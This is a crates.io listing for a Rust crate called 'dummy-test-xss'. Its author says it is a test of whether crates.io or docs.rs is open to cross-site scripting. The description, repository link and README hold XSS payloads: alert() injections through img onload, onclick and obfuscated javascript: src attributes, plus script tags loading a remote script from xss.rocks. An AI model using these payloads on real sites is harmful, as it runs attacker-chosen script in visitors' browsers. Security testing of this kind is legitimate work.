dummy-test-xss

Crates.iodummy-test-xss
lib.rsdummy-test-xss
version0.1.5
created_at2017-12-27 14:35:16.060857+00
updated_at2017-12-27 15:04:56.808401+00
description<img onload='alert('Injected 777')' src='https://google.com'>%3Cimg%20onload%3D'alert('Injected%20666')'%20src%3D'https%3A%2F%2Fgoogle.com'%3E
homepage
repositoryhttps://github.com/alanhoff/rust-test-xss"onclick=alert(09876543)"
max_upload_size
id44561
size7,208
Alan Hoffmeister (alanhoff)

documentation

README

Testing for JS injection

Try a meta tag

This crate is just a test, I'm trying to find if cargo.io and/or docs.rs may be vulnerable to XSS.

Try to hover this image

Try to execute javascript with src attr in img tag

<img src=j&#X41vascript:alert('Injected from poisoned src from img tag in README.md')>

<IMG SRC=java\0script:alert("XSS")>

<SCRIPT/XSS SRC="http://xss.rocks/xss.js">

<SCRIPT/SRC="http://xss.rocks/xss.js">

<

Commit count: 0

cargo fmt